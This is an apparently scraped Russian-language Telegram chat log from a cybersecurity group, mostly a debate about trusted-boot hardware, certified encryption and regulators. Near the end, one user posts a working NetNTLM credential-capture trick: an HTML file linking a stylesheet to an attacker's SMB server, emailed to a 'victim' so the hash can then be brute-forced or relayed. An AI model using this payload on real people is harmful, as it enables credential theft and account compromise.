Size: a a a

Чат ruCyberSecurity

2019 July 19

РМ

Роман Мылицын... in Чат ruCyberSecurity
Saches
А вы только отечественную нормативку читаете? Рекомендую расширять кругозор))
Ну проведите ликбез, что там на западе кошерно сейчас?
источник

VM

Vladimir Minakov in Чат ruCyberSecurity
Saches
Так  ктож об этом спорит. Есть требования регуляторов. Я ж не предлагаю не использовать АМДЗ там где это требуется. Речь именно о том, что требования пора менять на что-то более современное и актуальное и менее гиморное
Дать телефон отдела кадров ФСТЭК? Или эта фраза как раз демагогия,  которую Вы не любите?
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
К слову, ряд специалистов считает, что запад отстал от России в части технологий по защите информации
источник

@

@Anarius in Чат ruCyberSecurity
Роман Мылицын
Мне тут один специалист рассказывал, как надо делать защищённую систему: шифровать диск и Тор настроить.
Тор это конечно бред. Но что плохого в шифровании диска сертифицированными средствами ? Это вроде как одна из мер защиты от НСД ...
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
@Anarius
Тор это конечно бред. Но что плохого в шифровании диска сертифицированными средствами ? Это вроде как одна из мер защиты от НСД ...
Не, речь шла про несертифицированные средства, конечно
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Типа есть же бесплатные решения, зачем покупать сертифицированные поделки, мы же считаем деньги
источник

S

Saches in Чат ruCyberSecurity
Роман Мылицын
Ну проведите ликбез, что там на западе кошерно сейчас?
А что, никто не в курсе, как решается вопрос доверенной загрузки за бугром?
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Saches
А что, никто не в курсе, как решается вопрос доверенной загрузки за бугром?
Ну расскажите
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Мне тут вчера вообще рассказали об идеях отказа от мандатного разграничения доступа и перехода на один уровень секретности
источник

@

@Anarius in Чат ruCyberSecurity
Saches
А что, никто не в курсе, как решается вопрос доверенной загрузки за бугром?
Паролем на биос ? 🙂
источник

ДК

Дмитрий Калинин... in Чат ruCyberSecurity
Saches
А что, никто не в курсе, как решается вопрос доверенной загрузки за бугром?
они просто не выключают) поэтому и загружать не приходсят )
источник

S

Saches in Чат ruCyberSecurity
Роман Мылицын
Ну расскажите
Ну вы можете, считать что АМДЗ это просто эталон СЗИ.
А на мой взгляд, средство, которое было придумано и решало определенные вопросы во времена MSDos и Windows 3.11,  на сегодня, некий анахронизм, не оправдывающий затрат.
источник

РМ

Роман Мылицын... in Чат ruCyberSecurity
Saches
Ну вы можете, считать что АМДЗ это просто эталон СЗИ.
А на мой взгляд, средство, которое было придумано и решало определенные вопросы во времена MSDos и Windows 3.11,  на сегодня, некий анахронизм, не оправдывающий затрат.
А как правильно?
источник

AP

Andrei Potseluev in Чат ruCyberSecurity
Дмитрий Калинин
они просто не выключают) поэтому и загружать не приходсят )
Вообще, это недалеко от истины. Если брать запад, то там уже очень многие на тонких клиентах сидят.
источник

S

Saches in Чат ruCyberSecurity
@Anarius
Паролем на биос ? 🙂
Частично, читаем дальше...
источник

S

Saches in Чат ruCyberSecurity
Andrei Potseluev
Вообще, это недалеко от истины. Если брать запад, то там уже очень многие на тонких клиентах сидят.
Не думаю, что это прокатит, как орг мера
источник

S

Saches in Чат ruCyberSecurity
Vladimir Minakov
Дать телефон отдела кадров ФСТЭК? Или эта фраза как раз демагогия,  которую Вы не любите?
Достаточно близко))
источник

@

@Anarius in Чат ruCyberSecurity
Andrei Potseluev
Вообще, это недалеко от истины. Если брать запад, то там уже очень многие на тонких клиентах сидят.
И это правильно , так как сильно упрощает администрирование и усиливает безопасность
источник

Ш

Шурик in Чат ruCyberSecurity
Доброго дня, сегодня поделюсь (вдруг кто не знает), способом заполучить netntlm сессию пользователя. По ней можно сбрутфорсить пароль, а можно и перенаправить её на какой нибудь ресурс с авторизацией через ntlm. Все очень банально просто. Нужно создать html файл с содержимым: <link rel="stylesheet" href="//адрес вашего smb сервера"> . Полученный файл отправляем "жертве" по эл. почте. Если у жертвы браузер на chromium либо ie + нет межсетевого экрана (соединения по смб в интернет не запрещены), то вы получите netntlm сессию. Бага была отправлена в google, там сказали что знают о ней 100 тысяч репортов назад. Бага была отправленя в яндекс (ибо яндекс браузер ведёт себя точно так же), яндекс решил не отвечать на письмо.  Такие вот дела, малварь не нужна чтобы заполучить пароль пользователя.
источник

V

Valeriy G.B. in Чат ruCyberSecurity
а причём тут яндекс и гугл?
источник